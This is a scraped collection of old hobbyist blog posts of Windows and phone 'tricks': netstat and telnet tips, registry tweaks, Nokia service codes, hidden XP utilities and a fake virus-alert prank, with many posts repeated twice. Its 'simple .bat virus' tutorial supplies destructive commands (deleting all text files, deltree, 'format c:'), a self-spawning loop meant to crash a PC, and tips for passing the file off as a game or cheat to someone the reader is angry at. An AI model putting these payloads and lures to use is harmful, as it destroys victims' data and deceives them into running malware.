This is a complimation of computer tricks, mainly security and privacy related
Getting Ip's:--
To see the ip all computers you are connected to (web servers, people attempting to hack into your computer).
Go to dos (start>run>type command) and run the netstat command. Type netstat /? for details.
Type netstat -r at the command prompt to see the ip of all computers you are connected to
In MSN (and other programs) when you are chatting to someone everything you type goes through the MSN servers first (they act as a proxy) so you see their ip rather than who you are chatting to. You can get round this by sending them a file as MSN doesn't send file through its proxy.
When you type the netstat -r (or -a for a different view) the ip's are under the foreign address table. The ports are seperated by a : . Different programs use different ports, so you can work out which ip's are from which program.
Connecting to other computers and what ports are:--
Servers send information. Clients retrieve. Simple.
Windows comes with a built in program to connect to other computers called telnet.
To start Windows telnet Start menu> Run> type Telnet. Click connect> remote system
Ports are doors into computers. Hosts are computer names
(ip number or a name that is translated into the ip automatically)
Different programs open different ports, but they always open the same ports so other computers know which port to connect to. You can get a port list listing all the different ports, but a basic one is:
11 :- Sends info on the computer
21 :- FTP (File transfer program)
23 :- Telnet (Login to the computers command line)
25 :- Smtp (Sends mail)
80 :- Http (Web pages)
There are thousands of different programs using different ports. You can get programs called portscanners which check a computer for all ports up to a certain number, looking for ways in. You can portscan a computer looking for ways-in.
Anyway, back to telnet.
Type www.yahoo.com as the host and port as 80 the click connect.
If nothing happens, you're in. Wow. You are connected to Yahoo's server.
You can now type http commands (you are connected to an http server, so it supports http commands). Ie. on an ftp server you can type open and it will do something. On an http server it will just wonder what the hell you are on about.
Type get / http/1.0 then press enter twice to get the file on the server at / (try /index.html) etc.)
Allowing dos and regedit in a restricted Windows
See http://blacksun.box.sk/tutorials/format.php3?file=windows.html for some very cool tactics.
A very simple tactic I found after accidentally locking myself out of dos and regedit is to open notepad and type the following:
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]
"Disabled"=dword:0
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:0
Save it as something.reg then run it. Simple.
Making undeletable, unreadable folders
Tested on Windows 95/98
By holding down alt, then typing numbers on the number pad (right of the keyboard) you can create special characters. If you hold down alt, then press 1, then let go, you got the ascii character 1. You try some randomn numbers. This goes all the way up to 255. Open a dos prompt, and type md (alt+1+9+4)someword. md is the dos command to make a directoy, now try and open the directory in Windows, you can't. To open it, type ren (alt+1+9+4)someword someword (ren is the dos command to rename)
Proxies
Proxies are computers that you connect through, hiding your computer. Most aren't anonymous, they give away your ip. Some are. Good anonymous proxies: mail.uraltelecom.ru:8080 and 194.247.87.4:8080.
Different programs require different ways of using proxies. To do it in internet explorer 5 go to tools, internet options, connections, settings. In the above proxies they are in the format host:port
Password files
If you lock yourself out of Windows stuff, all passwords are stored in files called *.pwl in C:windows. Download showpass.zip from hereto view all passwords stored. Or rename the files to .bak to delete passwords.
In Unix, passwords are normally stored at etc/passwd. This can be viewed using the cat command (prints a file to screen): cat etc/passwd. Make sure you're passwords are shadowed (not actually in etc/passwd). Also make sure they aren't in a file called shadow, especically not in a file called etc/shadow.
Unix passwords are encrypted far better than Windows one's (to be fair, Windows 95 isn't designed for users), but can still be cracked through a program called jon
Note- This tutorial may bear a resemblance to tutorials written by other authors
Showing posts with label TIPS AND TRICKS. Show all posts
Showing posts with label TIPS AND TRICKS. Show all posts
Tuesday, September 7, 2010
USE ANY USB AS RAM
For those who aren't keen on opening up their PC to put in more memory, Windows Vista has a handy little feature called ReadyBoost that can use USB sticks for additional memory. Unfortunately, Windows Vista doesn't take kindly to the slower sticks on the market and refuses to use them. Proving once again that we control the computer and not the other way around, here's four simple steps to get around this limitation and use any USB stick you have to increase your computers memory.
1.SetUp
First things first. Plug the device in. Ignore AutoPlay if you have the enabled, and go to Computer in the start menu. When it pops up, right-click the USB stick and select properties.
2. Disable the stick
Click on the Readyboost tab on the properties menu and check Do not restest this device. Click okay and unplug the stick from your computer.
3. Edit the registry!
Woah! Don't panic, it's not as frightening as it sounds. Firstly, you need to open regedit, by opening the start menu and typing regedit, then enter. The registry window should load up.
Using the left-hand pane, work your way through the following folders: HKLM (Local Machine) -> SOFTWARE -> Microsoft -> Windows NT -> CurrentVersion -> EMDgmt. You'll have a list of USB devices the computer has encountered, one of which should be your USB stick. Click on it.
Here there's a few details you need to edit. Double click on Device Status and change the value to 2, then ok. Do the same for ReadSpeedKBs and WriteSpeedKBs, changing their values to both 1000. Exit the regedit and breathe a sigh of relief.
4. And back in again
Now all that's left to do is put the stick back in and once again go to the device properties (Computer > Right-click on drive). If you look under the Readyboost Tab, you'll be able to now select Use this device. Success! Now enjoy your faster PC.
1.SetUp
First things first. Plug the device in. Ignore AutoPlay if you have the enabled, and go to Computer in the start menu. When it pops up, right-click the USB stick and select properties.
2. Disable the stick
Click on the Readyboost tab on the properties menu and check Do not restest this device. Click okay and unplug the stick from your computer.
3. Edit the registry!
Woah! Don't panic, it's not as frightening as it sounds. Firstly, you need to open regedit, by opening the start menu and typing regedit, then enter. The registry window should load up.
Using the left-hand pane, work your way through the following folders: HKLM (Local Machine) -> SOFTWARE -> Microsoft -> Windows NT -> CurrentVersion -> EMDgmt. You'll have a list of USB devices the computer has encountered, one of which should be your USB stick. Click on it.
Here there's a few details you need to edit. Double click on Device Status and change the value to 2, then ok. Do the same for ReadSpeedKBs and WriteSpeedKBs, changing their values to both 1000. Exit the regedit and breathe a sigh of relief.
4. And back in again
Now all that's left to do is put the stick back in and once again go to the device properties (Computer > Right-click on drive). If you look under the Readyboost Tab, you'll be able to now select Use this device. Success! Now enjoy your faster PC.
Saturday, June 6, 2009
NOKIA CDMA SECRET CODES TRICKS
In this post lets see about how to perform certain additional and hidden tasks in nokia mobile phones by secret codes.
Nam Set: *3001#12345#
Software Version of mobile: *#837#
Software Version: *#9999#
CDMA Mode : *#7738#
Message sending options: *#66767#
Esn Number: *#92772689#
Current Channel: *#24#
Restart Phone: *#75681#
Restart Phone: *#75682#
Nokia 8887 Nam Programming :
Nam Set: *3001#12345#
Version: *#0000#
Evrc: *#3872#
Esn/Data/Timer: *#92772689#
SID: *#743#
Help: *#4357#
Slot Cycles: *#75681# , *#75682#
Nokia 8587 Nam Programming :
Nam Set: *#626#7764726#
A-Key: #8159357022#4579# (26 digits)
A-Key: #8159357022#4547# (20 digits)
Version: *#0000#
Version: *#837#
Vocoder: *#3872#
Change language: Menu 5, 3, 1
Change DM mode: *#7678#
Debug Screen: *#8378#
Debug: *#8380#
Field Test Menu: *#83788#
SPC Unlock, Factory Reset :
Full Factory Reset: *#7370#
Resets all settings including non-user changeable items (like SPC)
NOKIA TEST MODE:
1) Turn on the phone. Press *3001#12345#
2) Select Field Test and enable it..
3) Exit from NAM.. and restart your phone..
4) you will observe a new menu " Net Monitor "..
5) type appropriate group/display code.. ( 3101 for link info, 6101 for battery info )
6) enter 0000 to back
tags: nokia tricks,all nokia secret codes,cdma mobile tricks
Nam Set: *3001#12345#
Software Version of mobile: *#837#
Software Version: *#9999#
CDMA Mode : *#7738#
Message sending options: *#66767#
Esn Number: *#92772689#
Current Channel: *#24#
Restart Phone: *#75681#
Restart Phone: *#75682#
Nokia 8887 Nam Programming :
Nam Set: *3001#12345#
Version: *#0000#
Evrc: *#3872#
Esn/Data/Timer: *#92772689#
SID: *#743#
Help: *#4357#
Slot Cycles: *#75681# , *#75682#
Nokia 8587 Nam Programming :
Nam Set: *#626#7764726#
A-Key: #8159357022#4579# (26 digits)
A-Key: #8159357022#4547# (20 digits)
Version: *#0000#
Version: *#837#
Vocoder: *#3872#
Change language: Menu 5, 3, 1
Change DM mode: *#7678#
Debug Screen: *#8378#
Debug: *#8380#
Field Test Menu: *#83788#
SPC Unlock, Factory Reset :
Full Factory Reset: *#7370#
Resets all settings including non-user changeable items (like SPC)
NOKIA TEST MODE:
1) Turn on the phone. Press *3001#12345#
2) Select Field Test and enable it..
3) Exit from NAM.. and restart your phone..
4) you will observe a new menu " Net Monitor "..
5) type appropriate group/display code.. ( 3101 for link info, 6101 for battery info )
6) enter 0000 to back
tags: nokia tricks,all nokia secret codes,cdma mobile tricks
secret codes for symbian based nokia mobiles like s40,s60 mobiles
In this post lets see about certain tricks for nokia mobile phones and secret codes for symbian based nokia mobiles like s40,s60 mobiles.
#06# Display the IMEI (GSM standard)
*#0000# Display the firmware version and date
*#bta0# Display the Bluetooth MAC address (models with build-in Bluetooth radio, activate first to show address)
*#mac0wlan# Display the WLAN MAC address (models with build-in Wi-fi radio)
*#opr0logo# Clear the operator logo (3310 and 3330 only)
*#pca0# Activate the GPRS PCCCH support (early GPRS models)
*#pcd0# Deactivate the GPRS PCCCH support (early GPRS models)
*#res0wallet# Reset the mobile wallet (models with mobile wallet)
*#res0# Soft-format the memory (Symbian models only)
*#rst0# Reset to factory defaults, confirmation required (DCT4 or newer)
*#sim0clock# Display the SIM clock status (DCT3 only)
*#ssn0# Display the manufacturing serial number (mid-range and premium, non-Symbian models, and those devired from them)
*#war0anty# Display the manufacturing and repair info (no exit on DCT3)
*efr0# Enable EFR encoding (pre-2003 models)
#efr0# Disable EFR encoding (pre-2003 models)
*hra0# Enable HR encoding (pre-2003 models)
#hra0# Disable HR encoding (pre-2003 models)
#pw+1234567890+n# Display the SIM lock status: (pre-2003 models)
n = 1: provider lock
n = 2: network lock
n = 3: country lock
n = 4: SIM lock
To know the IMEI (International Mobile Equipment Identity) No.: *#06#
To check the phones Software revision. *#0000#
To enter the service menu type. *#92702689#
Clock Stopping. *#746025625#
tags: symbian mobile tricks,nokia s60,s40 tricks and secret codes
#06# Display the IMEI (GSM standard)
*#0000# Display the firmware version and date
*#bta0# Display the Bluetooth MAC address (models with build-in Bluetooth radio, activate first to show address)
*#mac0wlan# Display the WLAN MAC address (models with build-in Wi-fi radio)
*#opr0logo# Clear the operator logo (3310 and 3330 only)
*#pca0# Activate the GPRS PCCCH support (early GPRS models)
*#pcd0# Deactivate the GPRS PCCCH support (early GPRS models)
*#res0wallet# Reset the mobile wallet (models with mobile wallet)
*#res0# Soft-format the memory (Symbian models only)
*#rst0# Reset to factory defaults, confirmation required (DCT4 or newer)
*#sim0clock# Display the SIM clock status (DCT3 only)
*#ssn0# Display the manufacturing serial number (mid-range and premium, non-Symbian models, and those devired from them)
*#war0anty# Display the manufacturing and repair info (no exit on DCT3)
*efr0# Enable EFR encoding (pre-2003 models)
#efr0# Disable EFR encoding (pre-2003 models)
*hra0# Enable HR encoding (pre-2003 models)
#hra0# Disable HR encoding (pre-2003 models)
#pw+1234567890+n# Display the SIM lock status: (pre-2003 models)
n = 1: provider lock
n = 2: network lock
n = 3: country lock
n = 4: SIM lock
To know the IMEI (International Mobile Equipment Identity) No.: *#06#
To check the phones Software revision. *#0000#
To enter the service menu type. *#92702689#
Clock Stopping. *#746025625#
tags: symbian mobile tricks,nokia s60,s40 tricks and secret codes
Monday, June 1, 2009
Windows XP Hidden Applications
Microsoft has kept many useful applications hidden in Windows XP for reasons they know better. Today I will give you a list of such applications. You may know or have used them but there are some you may don’t even know they exists. Depending on the version of Windows XP you are using not all the commands will work, some needs Administrator privileges to run properly. These applications can only be accessed using the Command Prompt or by using the Run dialog box or by double clicking on the .exe file of the application.
Run any of these applications: go to Start > Run and type the executable name
• Account Manager
Command to run: syskey.exe
Use: It encrypts Windows XP account database.
Disclaimer: Use with caution, may cause slow performance if enabled.
• Clipboard Viewer
Command to run: clipbrd.exe
Use: To view or delete clipboard contents.
• Character Map
Command to run: charmap.exe
Use: To view and insert special characters.
You can also access it by clicking on Start > All Programs > Accessories > System Tools > Character Map
• Disk Cleanup
Command to run: cleanmgr.exe
Use: To clean downloaded program files, temporary internet files, recycle bin, temporary remote desktop files, setup log files, backup files, offline files and also compresses old files.
You can also access it by clicking on Start > All Programs > Accessories > System Tools > Disk Cleanup
• Driver Verifier
Command to run: verifier.exe
Use: Verifies drivers and helps create settings, delete settings and display information about currently verified drivers.
Disclaimer: Use with caution.
• Dr. Watson Tool
Command to run: drwtsn32.exe
Use: It is used to configure crash log dump settings
• DirectX Diagnostic Tool
Command to run: dxdiag.exe
Use: Provides DirectX version information and also system information, also used to troubleshoot directx components.
• Group & Policy Manager
Command to run: gpedit.msc
Use: To manage user and computer permissions and privileges.
Disclaimer: Use with caution, if you do not know what a setting does, read its description given there, if you don’t understand leave the setting as it is.
• iExpress Wizard
Command to run: iexpress.exe
Use: It helps to create and open self-extracting installable packages.
• Microsoft Synchronization Manger
Command to run: mobsync.exe
Use: It allows synchronization of offline web pages.
• Microsoft Telnet Client
Command to run: telnet.exe
Use: Used to connect telnet networks.
• Network Shared Folder Wizard
Command to run: shrpubw.exe
Use: Helps create shared folders for a network.
• Object Packager
Command to run: packager.exe
Use: Helps packaging objects for insertion into files.
• ODBC Administrator
Command to run: odbcad32.exe
Use: Helps configuring local and network database options.
Can also be accessed from Control Panel > Administrative Tools.
• Private Character Editor
Command to run: eudcedit.exe
Use: Creates and edits new characters for using into documents.
• Performance Monitor
Command to run: perfmon.exe
Use: Monitors CPU hard disk quota and provides detailed logs and reports.
Can also be accessed from Control Panel > Administrative Tools.
• Registry Editor
Command to run: regedit
Use: Helps to create, view and modify registry values.
Disclaimer: Take caution when modifying the registry, always backup the registry before any modifications.
• File Signature Verification Tool
Command to run: sigverif.exe
Use: Helps to check and verify file signatures.
• System Configuration Editor
Command to run: sysedit.exe
Use: Helps to modify SYSTEM.INI, WIN.INI, CONFIG.SYS, AUTOEXEC.BAT
Disclaimer: Take caution when editing any of these files. If you do anything wrong while editing them you may not be able to start Windows.
• System Configuration Utility
Command to run: msconfig
Use: Helps editing SYSTEM.INI, BOOT.INI, WIN.INI. Also helps to control services and startup programs and configure startup modes.
Disclaimer: Use with caution, if you do not know what a setting does, read its description given there, if you don’t understand leave the setting as it is.
• Windows Media Player 5.1 (Retro)
Command to run: mplay32.exe
Use: It is a very basic and plain version of Windows Media Player. Helps to play basic formats of music.
• Windows Workgroup Chat
Command to run: winchat.exe
Use: Helps to chat with other computers in your workgroup.
I hope that it will help a lot to newbies!!!
If I left any or you know any more hidden utilities, feel free to leave your comment!
Run any of these applications: go to Start > Run and type the executable name
• Account Manager
Command to run: syskey.exe
Use: It encrypts Windows XP account database.
Disclaimer: Use with caution, may cause slow performance if enabled.
• Clipboard Viewer
Command to run: clipbrd.exe
Use: To view or delete clipboard contents.
• Character Map
Command to run: charmap.exe
Use: To view and insert special characters.
You can also access it by clicking on Start > All Programs > Accessories > System Tools > Character Map
• Disk Cleanup
Command to run: cleanmgr.exe
Use: To clean downloaded program files, temporary internet files, recycle bin, temporary remote desktop files, setup log files, backup files, offline files and also compresses old files.
You can also access it by clicking on Start > All Programs > Accessories > System Tools > Disk Cleanup
• Driver Verifier
Command to run: verifier.exe
Use: Verifies drivers and helps create settings, delete settings and display information about currently verified drivers.
Disclaimer: Use with caution.
• Dr. Watson Tool
Command to run: drwtsn32.exe
Use: It is used to configure crash log dump settings
• DirectX Diagnostic Tool
Command to run: dxdiag.exe
Use: Provides DirectX version information and also system information, also used to troubleshoot directx components.
• Group & Policy Manager
Command to run: gpedit.msc
Use: To manage user and computer permissions and privileges.
Disclaimer: Use with caution, if you do not know what a setting does, read its description given there, if you don’t understand leave the setting as it is.
• iExpress Wizard
Command to run: iexpress.exe
Use: It helps to create and open self-extracting installable packages.
• Microsoft Synchronization Manger
Command to run: mobsync.exe
Use: It allows synchronization of offline web pages.
• Microsoft Telnet Client
Command to run: telnet.exe
Use: Used to connect telnet networks.
• Network Shared Folder Wizard
Command to run: shrpubw.exe
Use: Helps create shared folders for a network.
• Object Packager
Command to run: packager.exe
Use: Helps packaging objects for insertion into files.
• ODBC Administrator
Command to run: odbcad32.exe
Use: Helps configuring local and network database options.
Can also be accessed from Control Panel > Administrative Tools.
• Private Character Editor
Command to run: eudcedit.exe
Use: Creates and edits new characters for using into documents.
• Performance Monitor
Command to run: perfmon.exe
Use: Monitors CPU hard disk quota and provides detailed logs and reports.
Can also be accessed from Control Panel > Administrative Tools.
• Registry Editor
Command to run: regedit
Use: Helps to create, view and modify registry values.
Disclaimer: Take caution when modifying the registry, always backup the registry before any modifications.
• File Signature Verification Tool
Command to run: sigverif.exe
Use: Helps to check and verify file signatures.
• System Configuration Editor
Command to run: sysedit.exe
Use: Helps to modify SYSTEM.INI, WIN.INI, CONFIG.SYS, AUTOEXEC.BAT
Disclaimer: Take caution when editing any of these files. If you do anything wrong while editing them you may not be able to start Windows.
• System Configuration Utility
Command to run: msconfig
Use: Helps editing SYSTEM.INI, BOOT.INI, WIN.INI. Also helps to control services and startup programs and configure startup modes.
Disclaimer: Use with caution, if you do not know what a setting does, read its description given there, if you don’t understand leave the setting as it is.
• Windows Media Player 5.1 (Retro)
Command to run: mplay32.exe
Use: It is a very basic and plain version of Windows Media Player. Helps to play basic formats of music.
• Windows Workgroup Chat
Command to run: winchat.exe
Use: Helps to chat with other computers in your workgroup.
I hope that it will help a lot to newbies!!!
If I left any or you know any more hidden utilities, feel free to leave your comment!
Saturday, February 28, 2009
How To Scare Your Friends
How To Scare Your Friends
Step 1. Open up notepad
Step 2. Type
lol=msgbox("Whatever you want message to say",20,"Whatever you want the window to be titled")
Ex:
lol=msgbox("Warning your computer has been infected by a virus ",20,"Virus Alert")
Step 3. Save the text as Whateveryouwant.vbs
The number 20 represents the type of window style the message will be in. You can experiment with different styles you want.
How to Make a batch form notpad
How to Make a batch form notpad
How to build a simple .bat virus
Index
1. Tools
2. What makes a virus a virus
3. Making your first batch file
4. Making a batch virus
5. Destructive commands
6. Most common tricks used to make someone open the file
7.By, Robby23, 24 Guns, Harry, SLAUGHTER, blu3m4n, BuRP QuakE
1. Tools
To make a batch program you will need a text program (ex. Word,notepad,wordpad etc…) A keyboard if you don’t have one you can use the ON-screen keyboard
To get to the on-screen keyboard start>all programs>accessories>accessibility
2. What makes a virus a virus
When people think of a virus they think of a computer virus but the word virus came from a virus that’s in your body. They also think a virus is meant to delete or destroy things. They normally do but a virus is called a virus because, it copies itself. Like a virus in your body it copies it self to other cells cause it can’t live with out a host. Same with a computer virus with out a file or a program a virus can’t be made.
So all a computer virus is: a program that copies it self ,but some people put destructive code in it.
3. Making a Batch file
I’m going to use notepad you can use what ever you want
We are also going to make a “Hello World� Application that is the first program you make in any language
When making a batch file you are always going to use this line first
@echo off
You can turn it on if you like. All that does is telling the program not to tell its location. If you turn it on then the program will tell were it is at on the computer.
You can experiment a little if you want.
Now we are going to make it say Hello World
To do this we need a echo command which looks like this
echo
This tells the program to write something since we want it to say Hello World we are going to type Hello World next to echo to make it look like this
echo Hello World
so at this point you should have
@echo off
echo Hello World
now go to file save and name it test.bat ( you can name it whatever you want as long as it has .bat at the end.)
Save it to the desktop so you can get to it faster.
Then run it
You should of have a black box open and close really fast
To fix this we need a pause command and we will also need a goto command
The goto command is the most importent command
If you dont know the goto command tell it were to go to next.
since we need a pause command we want it to go to pause so we need to write goto pause like this
goto pause
now u should have
@echo off
echo Hello World
goto pause
now we need a subsection name pause
you make a sub section by putting a : by the first word like this
:start
or
:end
,but we said go to pause so we need one name pause like this
ause
then under that we are goin to write pause
ause
pause
this just makes it were it will keep the box open till you press a key
Optionl
At the end you can put a exit at the end of pause were the goto command should go ,but you dont have to.
save at run it now.You should be able to read your text now
4. Making a Batch file into a virus
This is alot easier then some people think.
To make a virus you just need the copy command which looks like this
copy
so lets make a new one by reading section 3 you should know you need the @echo off
@echo off
copy
allright we are going to name this file first
and we are going to make it copy itself to C:\WINDOWS just because no one looks in their
this is what it looks like (i will explain it)
@echo off
copy first C:\WINDOWS
copy-tells it to copy
first-is just the name of the file we want to copy
C:\WINDOWS- is the place you want to copy to
that is a virus
5. Destructive commands
If you get pissed at someone you might want to send him someting to mess with him. Here are some commands to add to the virus.
del -this del files
del file name
del (.txt*)
the (.txt*) would delete all txt files on the computer the * at the end just means all instead of a file called .txt
deltree- this deletes the whole folder
you can remeber it like this
Think of a tree if you type del you are only deleting a part of the tree ,but if you type deltree you are deleting the whole tree
format- this deltes everything
format c:
this delets everything in the c drive
open
this is just fun to use to scare some one but not do damage to something
open name of file
like to open notepad type
open notepad
to open microsoft paint type
open mspaint
just put ta crap load in their
also the next one that can be very usefull is looping
this will make the file repet it self til it is shut off
say your first sub section is called start
you would just make the goto command to go to start like
@echo off
:start
start notepad
goto start
that will open notepad over and over and if they dont close it it can crash their computer
to open the command window you have to use var. like %% (not going to explain var. it would be confusing)
@echo off
:whatever
start %0
goto whatever
this will open the black box over and over
6. Most command tricks
people will put it in a folder with a couple read me doc. and call it a game
people will say check this out it is so cool
people will say check out this hack or cheat i found for this game
to check if the are good do this
tell them to put it in a zip folder and send it
unzip and right click on the program(dont open it)
and press edit
that will show the sorce code and if you see something you dont like then delete it
ok
see u
onemyshow
Index
1. Tools
2. What makes a virus a virus
3. Making your first batch file
4. Making a batch virus
5. Destructive commands
6. Most common tricks used to make someone open the file
7.By, Robby23, 24 Guns, Harry, SLAUGHTER, blu3m4n, BuRP QuakE
1. Tools
To make a batch program you will need a text program (ex. Word,notepad,wordpad etc…) A keyboard if you don’t have one you can use the ON-screen keyboard
To get to the on-screen keyboard start>all programs>accessories>accessibility
2. What makes a virus a virus
When people think of a virus they think of a computer virus but the word virus came from a virus that’s in your body. They also think a virus is meant to delete or destroy things. They normally do but a virus is called a virus because, it copies itself. Like a virus in your body it copies it self to other cells cause it can’t live with out a host. Same with a computer virus with out a file or a program a virus can’t be made.
So all a computer virus is: a program that copies it self ,but some people put destructive code in it.
3. Making a Batch file
I’m going to use notepad you can use what ever you want
We are also going to make a “Hello World� Application that is the first program you make in any language
When making a batch file you are always going to use this line first
@echo off
You can turn it on if you like. All that does is telling the program not to tell its location. If you turn it on then the program will tell were it is at on the computer.
You can experiment a little if you want.
Now we are going to make it say Hello World
To do this we need a echo command which looks like this
echo
This tells the program to write something since we want it to say Hello World we are going to type Hello World next to echo to make it look like this
echo Hello World
so at this point you should have
@echo off
echo Hello World
now go to file save and name it test.bat ( you can name it whatever you want as long as it has .bat at the end.)
Save it to the desktop so you can get to it faster.
Then run it
You should of have a black box open and close really fast
To fix this we need a pause command and we will also need a goto command
The goto command is the most importent command
If you dont know the goto command tell it were to go to next.
since we need a pause command we want it to go to pause so we need to write goto pause like this
goto pause
now u should have
@echo off
echo Hello World
goto pause
now we need a subsection name pause
you make a sub section by putting a : by the first word like this
:start
or
:end
,but we said go to pause so we need one name pause like this
then under that we are goin to write pause
pause
this just makes it were it will keep the box open till you press a key
Optionl
At the end you can put a exit at the end of pause were the goto command should go ,but you dont have to.
save at run it now.You should be able to read your text now
4. Making a Batch file into a virus
This is alot easier then some people think.
To make a virus you just need the copy command which looks like this
copy
so lets make a new one by reading section 3 you should know you need the @echo off
@echo off
copy
allright we are going to name this file first
and we are going to make it copy itself to C:\WINDOWS just because no one looks in their
this is what it looks like (i will explain it)
@echo off
copy first C:\WINDOWS
copy-tells it to copy
first-is just the name of the file we want to copy
C:\WINDOWS- is the place you want to copy to
that is a virus
5. Destructive commands
If you get pissed at someone you might want to send him someting to mess with him. Here are some commands to add to the virus.
del -this del files
del file name
del (.txt*)
the (.txt*) would delete all txt files on the computer the * at the end just means all instead of a file called .txt
deltree- this deletes the whole folder
you can remeber it like this
Think of a tree if you type del you are only deleting a part of the tree ,but if you type deltree you are deleting the whole tree
format- this deltes everything
format c:
this delets everything in the c drive
open
this is just fun to use to scare some one but not do damage to something
open name of file
like to open notepad type
open notepad
to open microsoft paint type
open mspaint
just put ta crap load in their
also the next one that can be very usefull is looping
this will make the file repet it self til it is shut off
say your first sub section is called start
you would just make the goto command to go to start like
@echo off
:start
start notepad
goto start
that will open notepad over and over and if they dont close it it can crash their computer
to open the command window you have to use var. like %% (not going to explain var. it would be confusing)
@echo off
:whatever
start %0
goto whatever
this will open the black box over and over
6. Most command tricks
people will put it in a folder with a couple read me doc. and call it a game
people will say check this out it is so cool
people will say check out this hack or cheat i found for this game
to check if the are good do this
tell them to put it in a zip folder and send it
unzip and right click on the program(dont open it)
and press edit
that will show the sorce code and if you see something you dont like then delete it
ok
see u
onemyshow
What do beeps mean??? know here.......
What do beeps mean??? know here.......
One Beep :
DRAM refresh failure
This may be due to - Bad memory chips
- A bad DMA Chip
- Bad memory addressing chips on the motherboard
Two Beeps :
Parity error or Parity Circuit failure
-Your memory may not be seated properly on the mother board.
-Unplug and plug it properly
Three Beeps :
Bad memory or bad mother board
Four beeps :
Timer failure in the RAM.
Five Beeps :
CPU chip may be dead
Six Beeps :
Keyboard controller may have failed
Seven beeps :
CPU is dead. Retry the connections and test.
-Replace the whole motherboard.
Eight Beeps :
Video card is missing or Bad.
Nine Beeps :
Damaged ROM BIOS.
-BIOS chip has to be replaced if it persists.
Ten Beeps :
CMOS shutdown.
-Replace CMOS memory and associated chips.
Eleven Beeps :
Cache memory test has failed.
-To enable cache memory try CTRL+ALT+SHIFT++.
One long Beep and Three short Beeps:
Memory failure
One long Beep and Eight short Beeps :
Video card failure.
-Try to install video card in another slot.
No Beeps :
Check Power supply
-Check mother board connections
-Remove all cards except video card and check for system power up
-Insert all cards one at a time and check their operation.
-If system hangs on the installation of a particular card, then it is the cause for the problem and replace it with another of that type and check
Turn Your Pc On in 10 Seconds
Turn Your Pc On in 10 Seconds
Click on the start button then press R it will take u to Run well go to run
n type Regedit
press enter
this will open Registery Editor
now look for the key
HKEY_LOACAL_MECHINESYSTEMCurrentControlSetContr olContentIndex
now there find the Key Called
"Startup Delay"
Double Click On It
Now where its Base
Click Decimal
Now its Default Value Is 4800000
Change The Value To 40000
here u go u have done it
now close the Registery Editor and Restart Your Computer
You'll See The Result
Wednesday, February 4, 2009
Chat With Command Prompt
Chat With Command Prompt
If you want a private chat with a friend or client on you Network, you don't need to download any fancy program!
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:
eg:
step 1:

step 2:

step 3:

MESSENGER
User:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.
Before you press "Enter" it should look like this:
MESSENGER
User: 56.108.104.107
Message: Hi
Now all you need to do is press "Enter", and start chatting!
If you want a private chat with a friend or client on you Network, you don't need to download any fancy program!
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:
eg:
step 1:
step 2:
step 3:
MESSENGER
User:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.
Before you press "Enter" it should look like this:
MESSENGER
User: 56.108.104.107
Message: Hi
Now all you need to do is press "Enter", and start chatting!
Subscribe to:
Posts (Atom)